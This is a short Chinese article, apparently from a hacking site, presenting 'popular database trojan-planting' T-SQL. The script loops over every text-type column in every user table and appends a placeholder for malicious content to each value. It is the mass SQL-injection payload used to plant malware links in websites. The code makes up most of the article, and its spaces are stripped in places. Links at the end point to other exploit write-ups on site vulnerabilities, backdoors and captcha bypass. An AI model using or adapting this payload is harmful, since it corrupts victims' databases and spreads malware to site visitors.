最近比较流行的数据库挂马
摘要:SQL语句如下:用游标遍历所有表里如下数据类型的字段,然后UPDATE挂马。(全部是允许写入字符的字段)xtype=99ntextxtype...
SQL语句如下:
用游标遍历所有表里如下数据类型的字段,然后UPDATE挂马。(全部是允许写入字符的字段)
xtype=99ntext
xtype=35text
xtype=231nvarchar
xtype=167varchar
———————YD的分割——————————–
DECLARE@Tvarchar(255),
@Cvarchar(255)
DECLARETable_CursorCURSORFOR
Select
a.name,b.name
fromsysobjectsa,
syscolumnsb
wherea.id=b.idand
a.xtype='u'and
(b.xtype=99orb.xtype=35orb.xtype=231orb.xtype=167)
OPENTable_Cursor
FETCHNEXTFROMTable_CursorINTO@T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec('update['+@T+']set['+@C+']=
rtrim(convert(varchar,['+@C+']))+
”挂马内容”')
FETCHNEXTFROMTable_CursorINTO@T,@C
END
CLOSETable_Cursor
DEALLOCATETable_Cursor
———————YD的分割——————————–
【最近比较流行的数据库挂马】相关文章:
★ 揭露88red生成htm静态页面企业建站系统漏洞第1/2页
★ IIS5 ISAPI Extension Back Door
上一篇:
小议yxbbs漏洞利用代码
下一篇:
轻轻绕过你的验证码并进行攻击